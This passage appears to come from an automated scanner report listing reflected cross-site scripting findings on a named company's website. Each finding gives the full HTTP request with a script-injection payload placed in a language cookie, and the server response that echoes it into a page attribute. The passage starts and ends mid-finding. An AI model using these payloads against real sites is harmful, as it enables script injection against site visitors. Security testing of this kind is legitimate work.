Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33d8"><script>alert(1)</script>9427a0c6b34 was submitted in the mbfcookie[lang] cookie. This input was echoed as e33d8\"><script>alert(1)</script>9427a0c6b34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /es/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene33d8"><script>alert(1)</script>9427a0c6b34; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9c3ed27b413e57a1b3a097d69fb69da0; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:47 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:47 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Fri, 04-Feb-2011 00:04:48 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:04:50 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene33d8\"><script>alert(1)</script>9427a0c6b34">
...[SNIP]...

2.161. http://www.arbornetworks.com/fr/4.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7922b"><script>alert(1)</script>692436b615a was submitted in the mbfcookie[lang] cookie. This input was echoed as 7922b\"><script>alert(1)</script>692436b615a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fr/4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en7922b"><script>alert(1)</script>692436b615a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e816be6b7e10a7833fede5081bc89561; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:50 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:50 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Thu, 03-Feb-2011 23:57:51 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:57:52 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en7922b\"><script>alert(1)</script>692436b615a">
...[SNIP]...

2.162. http://www.arbornetworks.com/fr/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48fef"><script>alert(1)</script>d8a50681f6d was submitted in the mbfcookie[lang] cookie. This input was echoed as 48fef\"><script>alert(1)</script>d8a50681f6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fr/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en48fef"><script>alert(1)</script>d8a50681f6d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=27d583331c6a7879eddd591a037c3b05; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:05 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:05 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Fri, 04-Feb-2011 00:05:06 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:15 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en48fef\"><script>alert(1)</script>d8a50681f6d">
...[SNIP]...

2.163. http://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c78"><script>alert(1)</script>04e4fe7d485 was submitted in the mbfcookie[lang] cookie. This input was echoed as 51c78\"><script>alert(1)</script>04e4fe7d485 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en51c78"><script>alert(1)</script>04e4fe7d485; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=c5fd5a1d7428bc9ca259b0b09b906436; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:06 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:06 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:07 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:08 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en51c78\"><script>alert(1)</script>04e4fe7d485">
...[SNIP]...

2.164. http://www.arbornetworks.com/it [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6b5"><script>alert(1)</script>22edd466f97 was submitted in the mbfcookie[lang] cookie. This input was echoed as bd6b5\"><script>alert(1)</script>22edd466f97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /it HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbd6b5"><script>alert(1)</script>22edd466f97; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=545e64e48d805f5d6be6e0e99fa8ebd9; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:42 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:42 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Fri, 04-Feb-2011 00:02:43 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="enbd6b5\"><script>alert(1)</script>22edd466f97">
...[SNIP]...

2.165. http://www.arbornetworks.com/it/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b884f"><script>alert(1)</script>27d3dcaf1dc was submitted in the mbfcookie[lang] cookie. This input was echoed as b884f\"><script>alert(1)</script>27d3dcaf1dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /it/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enb884f"><script>alert(1)</script>27d3dcaf1dc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=a508c52cccdb7282c97e2f4a70359724; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Fri, 04-Feb-2011 00:05:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:43 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="enb884f\"><script>alert(1)</script>27d3dcaf1dc">
...[SNIP]...

2.166. http://www.arbornetworks.com/jp/2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8184b"><script>alert(1)</script>1699682b65d was submitted in the mbfcookie[lang] cookie. This input was echoed as 8184b\"><script>alert(1)</script>1699682b65d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jp/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en8184b"><script>alert(1)</script>1699682b65d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:58:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9ca9b70e153f8141430a46d74e981ee8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:58:36 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:58:36 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Thu, 03-Feb-2011 23:58:37 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:58:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en8184b\"><script>alert(1)</script>1699682b65d">
...[SNIP]...

2.167. http://www.arbornetworks.com/jp/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a5f"><script>alert(1)</script>be89fa02b90 was submitted in the mbfcookie[lang] cookie. This input was echoed as e4a5f\"><script>alert(1)</script>be89fa02b90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jp/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene4a5f"><script>alert(1)</script>be89fa02b90; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f2a9fb3cbd3eca6e85ad4f71016475b1; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:14 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:14 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Fri, 04-Feb-2011 00:05:15 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:18 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene4a5f\"><script>alert(1)</script>be89fa02b90">
...[SNIP]...

2.168. http://www.arbornetworks.com/kr/2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6f9"><script>alert(1)</script>0bc779789b was submitted in the mbfcookie[lang] cookie. This input was echoed as ad6f9\"><script>alert(1)</script>0bc779789b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /kr/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enad6f9"><script>alert(1)</script>0bc779789b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=0a6b97f628d39a90dee2831d97a64c92; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:55 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:55 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Fri, 04-Feb-2011 00:01:56 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="enad6f9\"><script>alert(1)</script>0bc779789b">
...[SNIP]...

2.169. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/network-infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2d6"><script>alert(1)</script>e91882c8043 was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e2d6\"><script>alert(1)</script>e91882c8043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /kr/network-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4e2d6"><script>alert(1)</script>e91882c8043; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=fe71f0ac4b9241c4bc66dbfa4b51bc91; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:42 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:42 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Fri, 04-Feb-2011 00:05:43 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:46 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en4e2d6\"><script>alert(1)</script>e91882c8043">
...[SNIP]...

2.170. http://www.arbornetworks.com/privacy_policy.php [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /privacy_policy.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac374"><script>alert(1)</script>5a50e0c21ab was submitted in the mbfcookie[lang] cookie. This input was echoed as ac374\"><script>alert(1)</script>5a50e0c21ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy_policy.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enac374"><script>alert(1)</script>5a50e0c21ab; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=cc0c770c26d7972f4e5fa31c38568bac; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:43 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:43 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:56:44 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:44 GMT
Cache-Control: no-store, no-cache, must-revalidate
